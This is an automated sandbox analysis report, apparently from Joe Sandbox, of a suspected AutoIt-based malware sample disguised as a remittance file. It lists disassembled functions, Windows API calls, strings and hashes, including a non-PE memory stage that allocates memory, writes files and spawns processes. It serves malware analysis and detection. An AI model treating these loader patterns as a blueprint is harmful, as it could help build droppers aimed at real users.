                                                                      • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                      • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                      • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2065 3ec2d90-3ec2de2 call 3ec2c90 CreateFileW 2068 3ec2deb-3ec2df8 2065->2068 2069 3ec2de4-3ec2de6 2065->2069 2072 3ec2dfa-3ec2e06 2068->2072 2073 3ec2e0b-3ec2e22 VirtualAlloc 2068->2073 2070 3ec2f44-3ec2f48 2069->2070 2072->2070 2074 3ec2e2b-3ec2e51 CreateFileW 2073->2074 2075 3ec2e24-3ec2e26 2073->2075 2077 3ec2e75-3ec2e8f ReadFile 2074->2077 2078 3ec2e53-3ec2e70 2074->2078 2075->2070 2079 3ec2e91-3ec2eae 2077->2079 2080 3ec2eb3-3ec2eb7 2077->2080 2078->2070 2079->2070 2081 3ec2ed8-3ec2eef WriteFile 2080->2081 2082 3ec2eb9-3ec2ed6 2080->2082 2084 3ec2f1a-3ec2f3f CloseHandle VirtualFree 2081->2084 2085 3ec2ef1-3ec2f18 2081->2085 2082->2070 2084->2070 2085->2070
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03EC2DD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                      • Instruction ID: e35dd090c76f83adb43321ccbeb93939382ba4eb521d996354c01e636bc19954
                                                                      • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                      • Instruction Fuzzy Hash: 5451FB75A50248FBDF24DFA4CD49FDE7778AF48700F108A58FB4AFA180DAB496458B60

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2095 4102b0-4102c5 SHGetMalloc 2096 4102cb-4102da SHGetDesktopFolder 2095->2096 2097 425dfd-425e0e call 433244 2095->2097 2098 4102e0-41031a call 412fba 2096->2098 2099 41036b-410379 2096->2099 2107 410360-410368 2098->2107 2108 41031c-410331 SHGetPathFromIDListW 2098->2108 2099->2097 2105 41037f-410384 2099->2105 2107->2099 2109 410351-41035d 2108->2109 2110 410333-41034a call 412fba 2108->2110 2109->2107 2110->2109
                                                                      APIs
                                                                      • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                      • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                      • _wcsncpy.LIBCMT ref: 004102ED
                                                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                      • _wcsncpy.LIBCMT ref: 00410340
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                      • String ID: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                      • API String ID: 3170942423-3351384526
                                                                      • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                      • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                      • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                      • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2113 401250-40125c 2114 401262-401293 call 412f40 call 401b80 2113->2114 2115 4012e8-4012ed 2113->2115 2120 4012d1-4012e2 KillTimer SetTimer 2114->2120 2121 401295-4012b5 2114->2121 2120->2115 2122 4012bb-4012bf 2121->2122 2123 4272ec-4272f2 2121->2123 2124 4012c5-4012cb 2122->2124 2125 42733f-427346 2122->2125 2126 4272f4-427315 Shell_NotifyIconW 2123->2126 2127 42731a-42733a Shell_NotifyIconW 2123->2127 2124->2120 2128 427393-4273b4 Shell_NotifyIconW 2124->2128 2129 427348-427369 Shell_NotifyIconW 2125->2129 2130 42736e-42738e Shell_NotifyIconW 2125->2130 2126->2120 2127->2120 2128->2120 2129->2120 2130->2120
                                                                      APIs
                                                                        • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                        • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                        • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                      • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                      • String ID:
                                                                      • API String ID: 3300667738-0
                                                                      • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                      • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                      • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                      • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2131 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2134 427190-4271ae RegQueryValueExW 2131->2134 2135 40e4eb-40e4f0 2131->2135 2136 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2134->2136 2137 42721a-42722a RegCloseKey 2134->2137 2142 427210-427219 call 436508 2136->2142 2143 4271f7-42720e call 402160 2136->2143 2142->2137 2143->2142
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValue$CloseOpen
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                                      • API String ID: 1586453840-614718249
                                                                      • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                      • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                      • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                      • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                      • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                      • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                      • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                      • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                      • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                      APIs
                                                                      • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • _wcsncpy.LIBCMT ref: 00401C41
                                                                      • _wcscpy.LIBCMT ref: 00401C5D
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                      • String ID: Line:
                                                                      • API String ID: 1874344091-1585850449
                                                                      • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                      • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                      • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                      • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                      • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Close$OpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 1607946009-824357125
                                                                      • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                      • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                      • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                      • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                      APIs
                                                                        • Part of subcall function 03EC4710: Sleep.KERNELBASE(000001F4), ref: 03EC4721
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03EC4924
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: F8LNA0E3T8M0YP1UJI4N
                                                                      • API String ID: 2694422964-335757165
                                                                      • Opcode ID: 774cc8864c3b666e66f2fbe01b09cdc285027324f1eb1fc5d0b689117dc3dac3
                                                                      • Instruction ID: 9c95508b7f3769408d882dbdae9c4db95c0fb71c998996a73376fbd980e9c370
                                                                      • Opcode Fuzzy Hash: 774cc8864c3b666e66f2fbe01b09cdc285027324f1eb1fc5d0b689117dc3dac3
                                                                      • Instruction Fuzzy Hash: 9651B271D14399DAEF12DBA4C919BEFBBB8AF05304F044199E6087B2C0D7790B49CBA5
                                                                      APIs
                                                                        • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                      • _free.LIBCMT ref: 004295A0
                                                                        • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                        • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                        • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                        • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                        • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                        • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                      • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                      • API String ID: 3938964917-768773625
                                                                      • Opcode ID: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                                      • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                      • Opcode Fuzzy Hash: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                                      • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: Error:
                                                                      • API String ID: 4104443479-232661952
                                                                      • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                      • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                      • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                      • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,0040F545,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,004A90E8,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,?,0040F545), ref: 0041013C
                                                                        • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                        • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                        • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                        • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                      • String ID: X$pWH
                                                                      • API String ID: 85490731-941433119
                                                                      • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                      • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                      • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                      • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03EC34B5
                                                                      • ExitProcess.KERNEL32(00000000), ref: 03EC34D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CreateExit
                                                                      • String ID: D
                                                                      • API String ID: 126409537-2746444292
                                                                      • Opcode ID: 107eb1cf29a6b6651620623ade647468eaff304108e4c4019dc24045849d9433
                                                                      • Instruction ID: d8ac82ff4e8a9292fec821f88fa8e2d4cdfbbde0ca94fc74f2318845d05196c4
                                                                      • Opcode Fuzzy Hash: 107eb1cf29a6b6651620623ade647468eaff304108e4c4019dc24045849d9433
                                                                      • Instruction Fuzzy Hash: 91F0FFB555424CABDB60DFE1CD49FEE777CBF44705F048A08FB0A9A180DA7896088B61
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • _memmove.LIBCMT ref: 00401B57
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                      • String ID: @EXITCODE
                                                                      • API String ID: 2734553683-3436989551
                                                                      • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                      • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                      • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                      • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                      Strings
                                                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                      • C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe, xrefs: 00410107
                                                                      Memory Dump Source
